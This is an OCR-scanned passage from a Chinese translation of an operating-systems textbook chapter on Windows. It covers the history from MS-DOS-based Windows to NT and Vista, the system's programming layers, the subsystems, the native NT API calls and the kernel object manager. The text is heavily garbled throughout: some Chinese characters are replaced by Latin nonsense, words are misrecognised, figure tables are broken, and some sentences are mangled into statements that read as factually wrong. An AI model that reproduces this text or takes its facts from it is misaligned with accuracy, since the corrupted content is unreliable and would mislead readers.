Windows 3.0 不 是 一 蒜 真 正 的 操作 系统 ， 而 是 在 MS-DOS 上 应 用 了 
图 形 用 户 界面 ， 它 仍然 受到 机 器 和 文件 系统 的 控制 。 所 有 的 程序 在 同 
一 地 址 空间 内 运行 而 且 它 们 中 的 任何 一 处 bug 都 会 使 得 整个 系统 裔 让。 


在 1995 年 8 月 ，Windows 95 发 布 了 。 它 在 一 个 成 熟 的 系统 内 包括 
了 许多 特性 ， 包 括 虚 拟 内 存 、 进 程 管理 、 多 程序 设计 、32 位 的 程序 界 
面 。 然 而 ， 它 仍然 缺少 安全 性 ， 并 且 在 操作 系统 和 应 用 程序 之 间 提 供 
了 很 少 的 隔离 措施 。 因 此 这 些 不 稳定 的 问题 仍然 存在 ， 在 随后 发 布 的 
Windows 98 和 Windows Me 中 也 一 样 。 在 它们 中 MS-DOS 仍 然 以 16 位 汇 
编 编 码 运行 在 windows 操 作 系 统 核心 中 。 


11.1.3 ”21 世纪 : 基于 NTHJWindows 


在 20 世 纪 80 年 代 末 ， 微 软 认识 到 继续 开发 以 MS-DOS 为 核心 的 操作 


家 族 可 能 不 再 具有 很 大 的 竞争 优势 ， 因 为 它 已 经 受到 了 RISC 和 架构 的 挑 
战 。 为 了 讨论 这 些 因 素 ， 微 软 从 DEC 公 司 招 聘 了 一 些 由 Dave Cutler 带 领 
的 工程 师 ， 他 是 DEC 的 VMS 操 作 系 统 的 主要 架构 设计 者 。Cutler 被 指派 
开发 一 种 全 新 的 32 位 操作 系统 用 于 实现 OS/2， 微 软 当 时 联合 IBM 在 合 
作 开 发 OS/2 操 作 系 统 的 API 接 口 。 最 初 的 设计 文档 中 ，Cutler 的 团队 称 
这 种 操作 系统 为 NT OS/2。 


Cnutler 的 系统 由 于 包含 很 多 新 技术 被 称 作 NT (New Technology) 

(也 因为 最 初 的 目标 处 理 器 是 新 型 的 Intel 860 代 码 名 称 是 N10) ° NTF 
发 的 重点 是 方便 地 在 不 同 的 处 理 器 之 间 切 换 和 着 重 在 安全 性 和 可 靠 性 
方面 ， 它 同样 兼容 基于 MS-DOS 的 Windows 版 本 。Cutler 的 DEC 工作 背 
景 展现 在 多 个 方面 ， 有 不 止 一 处 体现 出 NT 系统 的 设计 和 VMS 以 及 其 他 
系统 设计 的 相似 性 ， 如 图 11-2 所 示 。 


DECH IFAS 
1973 RSX-11M 16 位 、 多 用 户 、 实 时 、 交 换 性 
1978 VAX/VMS 32 位 、 虚 拟 内 存 


1987 | VAXELAN 


1988 PRISM/Mica 在 MIPS/Ultrix 热 潮 中 被 取消 


图 11-2 由 Dave Cutler 开 发 的 DEC 操作 系统 


当 DEC 的 工程 师 〈 包 括 后 来 的 律师 ) 看 到 NT 与 YMS 是 如 此 相似 时 
(也 包括 他 们 没有 发 布 的 版 本 MICA) ， 一 场 有 关于 微软 使 用 了 DEC 的 
知识 产权 的 争论 在 DEC 和 微软 之 间 展 开 了 “。 最 终 的 结果 是 庭 外 和 解 。 
另外 ， 微 软 同意 在 一 段 时 间 内 支持 NT 系统 在 DEC 的 Alpha 机 器 上 的 使 
用 。 然 而 ， 这 些 都 不 能 把 DEC 从 它 在 微型 计算 机 上 的 错误 定位 和 轻视 
个 人 计算 机 的 观点 中 挽救 回来 。 如同 DEC 的 创始 者 Ken Olsen 在 1977 年 
评论 的 : “没有 人 会 想 要 在 家 里 拥有 计算 机 。” 这 使 得 DEC 在 1998 年 被 
出 售 给 康 柏 (Compaq) ， 而 后 者 稍 后 又 被 惠普 (Hewlett-Packard) 收 
购 。 


那些 仅仅 熟悉 UNIX 的 程序 员 发 现 NT 的 架构 非常 不 同 。 这 不 仅仅 是 
因为 受到 了 VMS 的 影响 ， 也 是 因为 在 当时 计算 机 系统 的 不 同 导 致 设计 
不 同 。UNIX 是 在 20 世 纪 70 年 代为 单 处 理 器 、16 位 、 微 内 存 、 切 换 系 统 
设计 的 ， 那 时 进程 是 最 小 的 并 行 和 组 成 单元 。 而 且 fork/exec 是 并 不 消耗 
很 多 资源 的 操作 命令 (因为 切换 系统 经 常 被 通过 磁盘 拷贝 ) 。NT 是 在 
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内 存 系统 已 经 非常 普及 。 在 NT 系统 中 ， 线 程 是 并 行 单元 ， 动 态 连 接 库 
是 组 成 的 单元 ， 并 且 forkwexec 是 被 通过 单一 操作 命令 来 实现 创建 一 个 全 
新 的 进程 ， 然 后 运行 男 外 一 个 程序 而 不 需要 首先 复制 一 个 拷贝 。 


第 一 个 基于 NT 的 Windows 版 本 (Windows NT 3.1) 在 1993 年 发 
布 ， 它 被 称 作 3.1 是 因为 那 时 的 消费 版 本 是 3.1。 与 BM 合作 开发 的 版 本 
也 建 六 了， 虽然 OS/2 的 界面 仍然 被 文 持 ，Windows API 的 32 位 扩展 称 为 
Win32。 在 生产 和 销售 NT 的 那 段 时 间 里 ，Windows 3.0 发 布 了 ， 并 且 在 
商业 上 取得 了 成 功 。 它 不 仅 可 以 运行 Win32 程 序 ， 并 且 使 用 Win32 兼 容 
库 o 


驶 像 基于 MS-DOS 的 Windows 的 最 初版 本 一 样 ， 基 于 NT 的 Windows 
的 最 初版 本 也 不 是 完全 成 功 的 。NT 需 要 更 多 的 内 存 ， 那 时 只 有 很 少 的 
32 位 应 用 程序 。 并 且 与 设备 驱动 和 应 用 程序 的 不 兼容 使 得 许多 消费 者 
重新 回 到 微软 仍 在 改进 的 基于 MS-DOS 的 Windows 一 一 发 布 于 1995 年 的 
Windows 95。Windows 95 提 供 像 NT 一 样 的 本 地 的 32 位 程序 界面 ， 但 是 
与 现存 的 16 位 程序 和 应 用 软件 有 更 好 的 兼容 性 。 并 不 使 人 惊奇 的 是 ， 
NT 的 早期 成 功 是 在 服务 絮 市 场 与 YMS 和 NetWare 的 竞争 中 。 


NT 人 确实 达到 了 可 移植 性 的 目标 ， 在 后 续 的 1994 和 1995 年 发 布 的 版 
本 中 增加 了 对 (小 指令 字 节 )MIPS 和 Power PC 架构 的 支持 。NT 最 初 最 主 


要 的 升级 是 在 1996 年 升级 成 为 Windows NT 4.0。 这 个 系统 包含 了 性 能 、 
安全 性 和 可 靠 性 ， 也 拥有 跟 Windows 95 同 样 的 用 户 界面 。 


图 11-3 显 示 了 Win32 API 和 Windows 之 间 的 关系 。 具 有 通用 的 API 接 
口 的 基于 MS-DOS 的 Windows 和 基于 NT 的 Windows 促 成 了 NT 的 成 功 。 


Win 32 应 用 程序 界面 


Windows Windows95/ 
i i < 98/98SE/Me 


图 11-3 Win32 API 接口 允许 程序 在 几乎 所 有 版 本 的 Windows 上 运行 


Windows NT/ 
2000/XP/Vista 


这 种 兼容 性 使 得 用 户 可 以 方便 地 从 Windows 95 移 植 到 NT， 操 作 系 
统 也 在 高 端的 计算 机 市 场 上 比如 说 服务 器 领域 中 扮演 了 很 重要 的 角 
色 。 然 而 ， 用 户 并 不 急切 地 希望 接纳 其 他 处 理 器 架构 ， 在 1996 年 
Windows NT 文 持 的 四 种 架构 中 (在 这 个 版 本 中 增加 了 对 DEC Alpha 的 
x) ， 只 有 x86 (就 是 奔腾 家 族 ) 在 下 一 个 主要 的 发 布 
2000 中 被 着 重地 文 持 。 


Windows 


Windows 2000 代 表 了 NI 的 重大 进化 。 增 加 的 关键 技术 包括 即 皇 即 
用 功能 〈 当 使 用 者 要 安装 新 的 PCI 卡 时 ， 不 再 需要 更 改 跳 线 ) 、 网 络 目 
录 服 务 (对 于 企业 用 户 ) 、 改 进 的 电源 管理 (对 于 笔记 本 用 户 ) 和 改 
进 的 GUI (对 于 任何 用 户 ) 。 


Windows 2000 技 术 上 的 成 功 ， 领 导 着 微软 继续 朝 着 通过 提高 应 用 
程序 和 设备 的 兼容 性 来 引导 下 一 个 系统 Windows XP， 而 Windows 98 则 
逐步 淡出 市 场 。Windows XP 包含 了 一 个 更 加 友好 的 外 观 及 感觉 的 图 形 
界面 ， 更 加 增强 了 微软 关于 关联 消费 者 以 及 增加 了 消费 者 推动 他 们 的 
雇主 来 接纳 他 们 已 经 熟悉 的 环境 的 销售 策略 。 这 一 策略 获得 了 压倒 性 
的 成 功 ， 在 最 初 的 几 年 里 ，Windows XP 被 安装 在 成 千 上 万 台 计 算 机 
上 ， 这 使 得 微软 成 功 实现 了 有 效 地 结束 基于 MS-DOS 的 Windows 系 统 这 
个 目标 。 


Windows XP 代 表 着 微软 的 一 种 新 的 发 展 路 径 ， 为 昌 面 用 户 和 企业 
用 户 发 布 了 不 同 的 版 本 。Windows XP 系统 太 复 杂 以 至 于 不 能 同时 提供 
高 质量 的 客户 端 以 及 服务 器 发 布 。Windows 2003 服 务 器 版 本 是 Windows 
XP 客 户 端 操作 系统 的 补充 ， 它 提供 了 对 Intel 64 位 安 腾 处 理 句 的 文 持 ， 
并 且 在 它 的 第 一 个 补丁 包 中 ， 对 AMD x64 架 构 的 服务 器 和 客户 机 都 提 
供 了 支持 。 微 软 利用 用 户 版 本 和 企业 版 本 不 同 的 发 布 时 间 来 增加 服务 
器 特性 ， 引 导 在 商业 主要 应 用 的 测试 。 图 11-4 显 示 了 Windows 用 户 版 本 
和 服务 器 版 本 的 关系 。 


用 户 版 本 服务 器 版 本 
Windows NT 1990 Windows NT Server 


Windows 2000 1999 Windows 2000 Server 
Windows XP Windows Server 2003 


图 11-4 Windows 用 户 版 本 和 服务 器 版 本 在 不 同时 间 发 布 


微软 紧 跟 着 Windows XP 后 面 的 是 一 个 雄心 勃勃 的 发 布 ， 令 PC 消费 
者 兴 奋 的 全 新 体验 。 最 终 的 结果 ，Windows Vista， 在 2006 年 下 半年 完 
成 ， 距 离 Windows X.R KAAF ° Windows Vista 声 称 有 全 新 开发 的 
图 形 用户 界 面 ， 新 的 安全 特性 。 大 多 数 改变 是 在 使 用 者 的 可 视 化 经 验 
和 兼容 性 方面 。 系 统 内 部 的 技术 大 幅度 地 提高 了 ， 进 行 了 很 多 内 部 编 
码 优化 和 许多 在 界面 上 的 改善 、 可 测量 性 和 可 信赖 性 。Vista 的 服务 器 
版 本 (Windows Server 2008) 在 用 户 版 本 的 一 年 之 后 发 布 ， 它 分 享 了 
同样 的 系统 内 核 ， 例 如 核心 、 驱 动 、 底 层 库 和 程序 。 


关于 早期 开发 NT 的 人 物 历史 在 一 本 书 《Show stopper) |"! 
(Zachary 1994) 里 有 相关 的 介绍 。 书 中 讲述 到 很 多 关键 的 人 物 ， 以 及 
在 如 此 庞大 的 软件 开发 工程 中 所 经 历 的 困难 。 


[1] 本 书 中 文 版 已 由 机 械 工 业 出 版 社 引 进出 版 ， 书 名 为 《 观 止 一 一 微软 
创建 NT 和 未 来 的 夺 命 狂奔 》， 书 号 为 ISBN 978-7-111-26530-6。 一 一 编 
辑 注 


11.1.4 Windows Vista 


Windows VistaiX 2!) T WGK BBA ERKE ARERR 。 
最 初 的 计划 太 过 于 激进 以 至 于 头 几 年 的 Vista 开 发 必须 以 更 小 的 范畴 重 
新 开始 。 计 划 严 重 依 赖 于 包括 微软 的 类 型 安全 、 垃 圾 回收 、.NET 语 言 
C# 等 在 内 的 技术 ， 以 及 一 些 有 意义 的 特性 ， 例 如 统一 存储 系统 用 来 从 
多 种 不 同 的 来 源 中 搜索 和 组 织 数 据 的 winFS。 整 个 操作 系统 的 规模 是 
相当 惊人 的 。 最 早 NT 系 统 发 行 时 只 有 300 万 条 C/C++ 语句 ， 到 NT4 时 增 
长 到 1600 万 ，2000 是 3000 万 ，XP 是 5000 万 ， 而 到 了 Vista 已 经 超过 了 


7000 万 。 


规模 增 大 的 大 部 分 原因 是 每 次 微软 公司 在 发 行 新 版 本 时 都 增加 一 
些 新 功能 。 在 system32 的 主 目录 中 ， 含 有 1600 个 动态 链接 库 (DLL) 
和 400 个 可 执行 文件 (EXE) ， 而 这 还 不 包含 让 用 户 网 上 冲浪 、 播 放 音 
乐 和 视频 、 发 电子 邮件 、 浏 览 文件 、 整 理 照片 甚至 制作 电影 各 种 各 样 
应 用 程序 的 目录 。 但 是 微软 想 让 客户 使 用 新 版 本 ， 所 以 它 兼 容 了 老 版 
本 的 所 有 特征 ， 应 用 程序 界面 API、 程 序 (小 的 应 用 软件 ) 等 。 几 乎 
很 少 有 功能 被 删 掉 。 结 果 随 着 版 本 的 升级 Windows 系 统 越 来 越 大 。 随 
着 科技 发 展 ，Windows 发 布 的 载体 也 从 软驱 ，CD 发 展 到 现在 的 
Windows Vista 上 的 DVD ° 


随 着 Windows 上 层 功能 和 程序 的 膨胀 使 得 和 其 他 操作 系统 在 有 效 
大 小 上 的 比较 成 问题 ， 因 为 很 难 定义 某 一 部 分 是 否 属于 操作 系统 。 在 
操作 系统 的 下 层 ， 因 为 执行 相关 联 的 功能 ， 所 以 通信 比较 频繁 。 即 使 
如 此 我 们 也 能 看 到 在 不 同 的 Windows 之 间 也 有 很 大 的 不 同 。 图 11-5 比 
较 了 Windows 和 Linux 的 核心 在 CPU 调度 、IO 设 备 和 虚拟 内 存 三 个 主要 
功能 方面 的 区 别 。Windows 中 前 两 部 分 是 Linux 的 一 半 大 小 ， 但 是 虚拟 
内 存 部 分 要 大 一 个 数量 级 一 一 因为 有 大 量 的 功能 ， 虚 拟 内 存 模 型 实现 


技术 需要 大 量 代码 实现 高 速 运行 。 


APR 
CPU 调度 器 50 000 75 000 


IO 基础 设施 45 000 60 000 
虚拟 内 存 25 000 175 000 


11-5 对 Windows 和 Linux 中 选 定 内 核 模块 的 代码 行 数 (LOC) 比 较 
(Æ A Microsoft Windows Internals 的 作者 Mark Russinovich) 


11.2 Windows Vista 编 程 


现在 开始 Windows Vista 的 技术 研究 。 但 是 ， 在 研究 详细 的 内 部 结 
构 之 前 ， 我 们 首先 看 看 系统 调用 的 本 地 NT APIAWin3 25842 FA e R 
管 有 可 移植 操作 系统 接口 (POSIX) ， 但 实际 上 为 Windows 编 写 的 代码 
不 是 Win32 就 是 .NET， 其 中 .NET 本 身 也 是 运行 在 Win32 之 上 的 。 


图 11-6 介 绍 的 是 windows 操 作 系 统 的 各 个 层次 。 在 Windows 应 用 程 
序 和 图 形 层 下 面 是 构造 应 用 程序 的 程序 接口 。 和 大 多 数 操作 系统 一 
样 ， 这 些 接口 主要 包括 了 代码 库 (DLL) ， 这 些 代码 库 可 以 被 应 用 程 
序 动态 链接 以 访问 操作 系统 功能 。Windows 也 包含 一 些 被 实现 为 单独 运 
行进 程 的 服务 的 应 用 程序 接口 。 应 用 软件 通过 远程 过 程 调 用 (RPC) 
与 用 户 态 服务 进行 通信 。 


Applets 〈 小 型 Win32 可 执行 程序 ) 


NT 服务 ; GUI(shell32.dll, user32.dll, gdi32.dll) 


smss, lsass,services, 动态 库 (ole32.dllrpc.dll) 


i 系统 进程 (csrss 
MARIOR: 了 TFT T AEn 


本 地 NT API, C/C++ 47 Ih} (ntdll.dll) 


内 核 态 NTOS 内 核 层 


i NTOS HÍT 4 (ntoskrnl.exe) 


硬件 抽象 层 HAL Chal.dll) 


图 11-6 Windows 的 编程 层 


NT 操作 系统 的 核心 是 NTOS 内 核 态 程序 (ntoskrnl.exe) ， 它 提供 了 
操作 系统 的 其 他 部 分 的 实现 所 依赖 的 传统 的 系统 调用 接口 。 在 Windows 
中 ， 只 有 微软 的 程序 员 编 写 系 统 调用 层 。 已 经 公开 的 用 户 态 接口 属于 
操作 系统 本 身 ， 它 通过 运行 在 NTOS 层 顶层 的 子 系统 (subsystem) 来 实 
现 的 。 


最 早 的 NT 文 持 三 个 个 性 化 子 系统 : OS/2、POSIX、Win32。OS/2 
在 Windows XP 中 已 经 不 使 用 了 。POSIX 也 同样 不 使 用 了 ， 但 是 客户 可 
以 得 到 一 个 叫做 Interix 的 改进 版 POSIX 的 子 系统 ， 它 是 微软 面向 UNIX 
的 服务 (SFU) 的 一 部 分 ， 因 此 所 有 设备 都 支持 系统 中 原 有 的 POSIX。 尽 
管 微软 支持 其 他 的 API， 但 大 多 数 Windows 的 应 用 软件 都 是 用 Win32 写 
的 。 


不 同 于 Win32，.NET 并 不 是 原来 NT 的 内 核 接 口上 的 正式 的 子 系 
统 。 相 反 ，.NEIT 是 建立 在 Win32 编 程 模型 之 上 的 。 这 样 就 可 以 使 NET 
与 现 有 的 Win32 程 序 很 好 地 互通 ， 而 不 必 关 心 POSIX 和 OS/2 子 系统 。 
WinFX API 包 含 了 很 多 Win32 的 功能 ， 而 实际 上 WinFX 基 本 类 库 (Base 
Class Library) 中 大 多 数 的 功能 都 是 win32 API 的 简单 包装 器 。WinFX 
的 优点 是 有 丰富 的 对 象 类 型 文 持 、 简 单一 致 的 界面 、 使 用 .NET 公 共 语 
BIST (CLR) 和 垃圾 收集 器 。 


如 图 11-7 所 示 ，NT 子 系统 建立 了 四 个 部 分 : 子 系统 进程 、 程 序 
库 、 创 建 进 程 (CreateProcess) 钩子 、 内 核 支 持 。 一 个 子 系统 进程 只 是 
一 个 服务 。 它 唯一 特殊 的 性 质 就 是 通过 smss.exe 程 序 (一 个 由 NT 启动 
的 初始 用 户 态 程序 ， 开 始 ， 以 响应 来 自 Win32 的 CreateProcess 或 不 同 的 
子 系统 中 相应 的 API 的 请 求 。 


子 系统 运行 时 库 
(CreateProcess 钩子 ) 
HPA 
ABA 


子 系统 内 核 支持 


本 地 程序 调用 (LPC) 
本 地 NI 系统 服务 
NTOS 执 行 体 


图 11-7 用 于 构建 NT 子 系统 的 模块 


程序 库 同时 实现 了 高 层 的 操作 系统 功能 和 特定 的 子 系统 进程 。 这 
些 高 层 的 操作 系统 功能 是 特定 于 子 系统 以 及 子 系统 所 包含 的 桩 程序 
(stub routine) 的 。 桩 程序 是 进行 不 同 的 使 用 子 系统 的 进程 间 通 信 的 。 


对 子 系统 进程 的 调用 通常 是 利用 内 核 态 的 本 地 过 程 调 用 LPC (Local 
Procedure Call) 所 提供 的 功能 。LPC 实 现 了 路 进 程 的 进程 调用 。 


在 Win32 CreateProcess FHF) F ENB (hook) 通过 查看 二 进 制 图 像 
来 检测 子 系统 中 每 个 程序 请 求 。 (如 果 它 没有 运行 ) 通过 smss.exe 启 动 
子 系统 进程 csrss.exe。 然 后 子 系统 进程 开始 加 载 程序 。 在 其 他 子 系统 
也 有 类 似 的 钩子 函数 (例如 POSIX 中 的 exec 系 统 调用 ) 。 


NT 内 核 有 很 多 一 般 用 途 的 设备 ， 可 以 用 来 编写 操作 系统 特定 的 子 
系统 。 但 是 为 了 准确 地 执行 每 一 个 子 系统 还 需要 加 入 一 些 特殊 的 代 
码 。 例 如 ， 本 地 NtCreateProcess 系 统 调 用 通过 重复 使 用 进程 实现 
POSIXF fork 函 数 调 用 ， 内 核 提 供 一 个 win32 特 殊 类 型 串 表 ( 叫 atoms)， 
通过 进程 有 效 实现 只 读 字符 串 的 共享 。 


子 系统 进程 是 本 地 端 NT 程 序 ， 其 使 用 NT 内 核 和 核心 服务 提供 的 使 
用 本 地 系统 调用 ， 例 如 smss.exe 和 lsass.exe 〈 本 地 安全 管理 ) 。 本 地 系 
统 调用 包括 管理 虚拟 地 址 的 跨 进程 功能 (facility) 、 线 程 、 句 柄 和 为 了 
运行 用 来 使 用 特定 子 系统 的 程序 而 创建 的 进程 中 的 异常 。 


11.2.1 内 部 NT 应 用 编程 接口 


像 所 有 的 其 他 操作 系统 一 样 ，Windows Vista 也 拥有 一 套 系 统 调 
用 。 它 们 在 Windows Vista 的 NTIOS 层 实施 ， 在 内 核 态 和 运行。 微软 没有 公 
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些 底层 程序 通常 是 以 操作 系统 的 一 部 分 〈 主 要 是 服务 和 子 系统 ) ,或 
者 是 内 核 态 的 设备 驱动 程序 的 形式 交付 的 。 本 地 的 NT 系统 调用 在 版 本 
的 升级 中 并 没有 太 大 的 改变 ， 但 是 微软 并 没有 选择 公开 ， 而 Windows 的 
应 用 程序 都 是 基于 Win32 的 ， 因 此 Win32 API 在 不 同 Windows 操 作 系 统 
中 是 通用 的 ， 从 而 能 够 让 这 些 应 用 程序 在 基于 MS-DOS 和 NT Windows 
的 系统 中 正确 运行 。 


大 多 数 内 部 的 NT 系统 调用 都 是 对 内 核 态 对 象 进行 操作 的 ， 包 括 文 
件 、 线 程 、 管 道 、 信 号 量 等 。 图 11-8 中 给 出 了 一 些 Windows Vista 中 NT 
所 支持 的 常见 内 核 态 对 象 。 以 后 ， 我 们 讨论 内 核对 象 管 理 侨 时 ， 会 讨 
论 具 体 对 象 类 型 细节 的 。 


信和 号 量 、 互 斥 量 、 时 间 、IPC 端 口 、 
IO 完成 队列 


文件 、 设 备 、 驱 动 、 定 时 器 
任务 、 进 程 、 线 程 、 节 、 标 签 


Win32 GUI 桌面 、 应 用 程序 回调 


图 11-8 内 核 态 对 象 类 型 的 普通 类 别 


有 时 使 用 术语 “对 象 "来 指 代 操 作 系统 所 控制 的 数据 结构 ， 这 样 束 
会 造成 困惑 ， 因 为 错误 理解 成 < 面向 对 象 " 了 “。 操 作 系统 的 对 象 提供 了 


数据 隐藏 和 抽象 ， 但 是 缺少 了 一 些 面 问 对象 体 系 基 本 的 性 质 ， 如 继承 
和 多 仿 性 。 


在 本 地 NT API 调 用 中 存在 创建 新 的 内 核 态 对 象 或 操作 已 经 存在 的 
对 象 的 调用 。 每 次 创建 和 打开 对 象 的 调用 都 返回 一 个 结果 叫 句 柄 
(handle) 给 调用 者 (caller) 。 句 柄 可 在 接 下 来 用 于 执行 对 象 的 操作 。 
句柄 是 特定 于 创建 它们 的 具体 的 进程 的 。 通 常 句 柄 不 可 以 直接 区 给 其 
他 进程 ， 也 不 能 用 于 同一 个 对 象 。 然 而 ， 在 某 些 情况 下 通过 一 个 受 保 
护 的 方法 有 可 能 把 一 个 句柄 复制 到 其 他 进程 的 句柄 表 中 进行 处 理 ， 多 
许 进程 共享 访问 对 象 一 一 即使 对 象 在 名 字 择 间 无 法 访问 。 复 制 句 柄 的 
进程 必须 有 来 源 和 目标 进程 的 句柄 。 


每 一 个 对 象 都 有 一 个 和 它 相 关 的 安全 描述 信息 ， 详 细 指 出 对 于 特 
定 的 访问 请 求 ， 什 么 对 象 能 够 或 者 不 能 够 针对 一 个 特定 的 目标 进行 何 
种 操作 。 当 句柄 在 进程 之 间 复 制 的 时 候 ， 可 添加 具体 的 被 复制 句柄 相 
天 的 访问 限制 。 从 而 一 个 进程 能 够 复制 一 个 可 读 写 的 句柄 ， 并 在 目标 
进程 中 把 它 改变 为 只 读 的 版 本 。 


并 不 是 所 有 系统 创建 的 数据 结构 都 是 对 象 ， 并 不 是 所 有 的 对 象 都 
征 内 核对 象 。 那 些 真正 的 内 核 态 对 象 是 那些 需要 命名 、 保 护 或 以 某 种 
方式 共享 的 对 象 。 通 常 ， 这 些 内 核 态 对 象 表 示 了 在 内 核 中 的 某 种 编程 
抽象 。 每 一 个 内 核 态 的 对 象 有 一 个 系统 定义 类 型 ， 有 明确 界定 的 操 


作 ， 并 占用 内 核 内 存 。 虽 然 用 户 态 的 程序 可 以 执行 操作 (通过 系统 调 
H) ， 但 是 不 能 直接 得 到 数据 。 


图 11-9 为 一 些 本 地 API 的 示例 ， 通 过 特定 的 句柄 操作 内 核对 象 ， 如 
进程 、 线 程 、IPC 端 口 和 扇 区 (用 来 描述 可 以 映射 到 地 址 空间 的 内 存 对 
象 ) 。NtCreateProcess 返 回 一 个 创建 新 进程 对 象 的 句柄 ，SectionHandle 
代表 一 个 执行 实例 程序 。 当 遇 到 异常 时 控制 进程 〈 例 如 异常 、 越 
F) ，DebugPort Handle 用 来 在 出 现 异常 (例如 ， 除 零 或 者 内 存 访问 越 
界 ) 之 后 把 进程 控制 权 交 给 调试 器 的 过 程 中 与 调试 器 


| NtCreateProcess(&ProcHandle, Access, SectionHandle, DebugPortHandle, ExceptPortHandle, ...) | 
_NiGreateThread(&ThreadHandle, ProcHandle, Access, ThreadContext, CreateSuspended, ...) | 
" NtAllocate VirtualMemory(ProcHandle, Addr, Size, Type, Protection, ...) | 
NtMapViewOfSection(SectHandle, ProcHandle, Addr, Size, Protection, ...) 


NtReadVirtualMemory(ProcHandle, Addr, Size, ...) 
NtWriteVirtualMemory(ProcHandle, Addr, Size, ...) 

NtCreateFile(&FileHandle, FileNameDescriptor, Access, ...) 
NtDuplicateObject(srcProcHandle, srcObjHandle, dstProcHandle, dstObjHandle, ...) 


图 11-9 在 进程 之 间 使 用 句柄 来 管理 对 象 的 本 地 NT API 调 用 示例 


NtCreate 线 程 需要 ProcHandle， 因 为 ProcHandle 可 以 在 任意 一 个 含 
有 人 句柄 的 进程 中 (有 足够 的 访问 权限 ) 创建 线程 。 同 样 ， 
NtAllocateVirtualMemory ` NtMapViewOfSection ` NtReadVirtualMemory 
和 NtWriteVirtualMemory 可 使 进程 不 仅 在 自己 的 地 址 空间 操作 ， 也 可 以 
在 分 配 虚 拟 地 址 和 映射 段 ， 还 可 以 读 写 其 他 进程 的 虚拟 内 存 。 


NtCreateFijle 是 一 个 内 部 API 调 用 ， 用 来 创建 或 打开 文件 。 
NtDuplicateObject， 可 以 在 不 同 的 进程 之 间 复 制 句 柄 的 API 调 用 。 


当然 不 是 只 有 Windows 有 内 核 态 对 象 。UNIX 系 统 也 同样 支持 内 核 
态 对 象 ， 例 如 文件 、 网 络 数据 包 、 管 道 、 设 备 、 进 程 、 共 享 内 存 的 IPC 
设备 、 消 息 端 口 、 信 号 和 IO 设备 。 在 UNIX 中 有 各 种 各 样 的 方式 命名 和 
访问 对 象 ， 例 如 文件 描述 符 、 进 程 ID、System V IPC 对 象 的 整形 ID 和 设 
备 人 节点。 每 一 类 的 UNIX 对 象 的 实现 是 特定 于 其 类 别 的 。 文 件 和 socket 
使 用 不 同 的 设施 facility， 并 且 是 System V IPC 机 制 、 程 序 、 装 置 之 外 
的 。 


Windows 中 的 内 核对 象 使 用 一 个 的 基于 NT 名 字 空 间 中 关于 对 和 象 的 
句柄 和 命名 统一 设备 指 代 内 核对 象 ， 而 且 使 用 一 个 统一 的 集中 式 对 象 
管理 硕 。 人 句柄 是 进程 特定 的 ， 但 正如 上 文 所 述 ， 可 以 在 被 另 一 个 进程 
使 用 。 对 象 管理 器 在 创建 对 象 时 可 以 给 对 象 命名 ， 可 以 通过 名 字 打 开 
对 象 的 句柄 。 


对 象 管理 右 在 NT 名 字 空 间 中 使 用 统一 的 字符 编码 标准 〈 宽 位 字 
符 ) 命名 。 不 同 于 UNIX，NT 一 般 不 区 分 大 小 写 〈 它 保留 大 小 写 但 不 区 
分 | 。NT 和 名字 空间 是 一 个 分 层 树 形 结 构 的 目录 ， 象 征 联 系 和 对 象 。 


对 象 管理 器 提供 统一 的 管理 同步 、 安 全 和 对 和 象 生命 期 的 设备 。 对 
于 对 象 管理 器 提供 给 用 户 的 一 般 设 备 是 否 能 为 任何 特定 对 象 的 用 户 所 


获得 ， 这 是 由 执行 体 部 件 来 决定 的 ， 它 们 都 提供 了 操纵 每 一 个 对 象 类 
型 的 内 部 API ° 


这 不 仅 是 应 用 程序 使 用 对 象 管理 器 中 的 对 象 。 操 作 系统 本 吴 也 创 
建 和 使 用 对 象 一 一 而 且 非 常 多 。 大 多 数 这 些 对 象 的 创建 是 为 了 让 系统 
的 某 个 部 分 存储 相当 一 段 长 时 间 的 信息 或 者 将 一 些 数据 结构 传递 给 其 
他 的 部 件 ， 但 这 都 受益 于 对 象 管理 器 对 命名 和 生存 周期 的 支持 。 例 
如 ， 当 一 个 设备 被 发 现 ， 一 个 或 多 个 设备 创建 代表 该 设备 对 象 ， 并 在 
理论 上 说 明 该 设备 如 何 连 接 到 系统 的 其 他 部 分 。 为 了 控制 设备 而 加 载 
设备 的 驱动 程序 ， 创 建 驱动 程序 对 象 用 来 保存 属性 和 提供 驱动 程序 所 
实现 的 函数 的 指针 ， 这 些 函 数 是 实现 对 VO 请 求 的 处 理 。 操 作 系 统 中 在 
以 后 使 用 其 对 象 时 会 涉及 这 个 驱动 。 驱 动 也 可 以 直接 通过 名 字 来 访 
问 ， 而 不 是 间接 的 通过 它 所 控制 的 设备 来 访问 的 (例如 ， 从 用 户 态 来 设 
置 控 制 它 的 操作 的 参数 ) 。 


不 像 UNIX 把 名 字 空 间 的 根 放 在 了 文件 系统 中 ，NT 的 名 子 空间 则 是 
保留 在 了 内 核 的 虚拟 内 存 中 。 这 意味 着 NT 在 每 次 系统 启动 时 ， 都 得 重 
新 创建 最 上 层 的 名 字 空 间 。 内 核 虚 拟 内 存 的 使 用 ， 使 得 NT 可 以 把 信息 
存储 在 名 子 空间 里 ， 而 不 用 和 有 先 局 动 文 件 系 统 。 这 也 使 得 NT 更 加 容 吻 
地 为 系统 添加 新 类 型 的 内 核 态 的 对 象 ， 原 因 是 文件 系统 自身 的 格式 不 
需要 为 每 种 新 类 型 的 目标 文件 进行 改变 。 


一 个 命名 的 目标 文件 可 以 标记 为 永久 性 的 ， 这 意味 着 这 个 文件 会 
一 直 存 在 ， 即 使 在 没有 进程 的 句柄 指向 该 对 象 条 件 下 ， 除 非 它 被 删除 
或 者 系统 重新 启动 。 这 些 对 象 甚至 可 以 通过 提供 parse 例 程 来 扩展 NT 的 
名 字 空 间 ， 这 种 例 程 方式 类 似 于 允许 对 象 具 有 UNIX 中 挂 载 点 的 功能 。 
文件 系统 和 注册 表 使 用 这 个 工具 在 NT 的 名 字 空 间 上 挂 载 卷 和 储 集 。 访 
问 到 一 个 卷 的 设备 对 象 即 访问 了 原始 卷 (raw volume) ， 但 是 设备 对 象 
也 可 以 表明 一 个 卷 可 以 加 载 到 NT 名 字 空 间 中 去 。 卷 上 的 文件 可 以 通过 
把 卷 相关 文件 名 加 在 卷 所 对 应 的 设备 对 象 的 名 称 后 面 来 访问 。 


永久 性 名 字 也 用 来 描述 同步 的 对 象 或 者 共享 内 存 ， 因 此 它们 可 以 
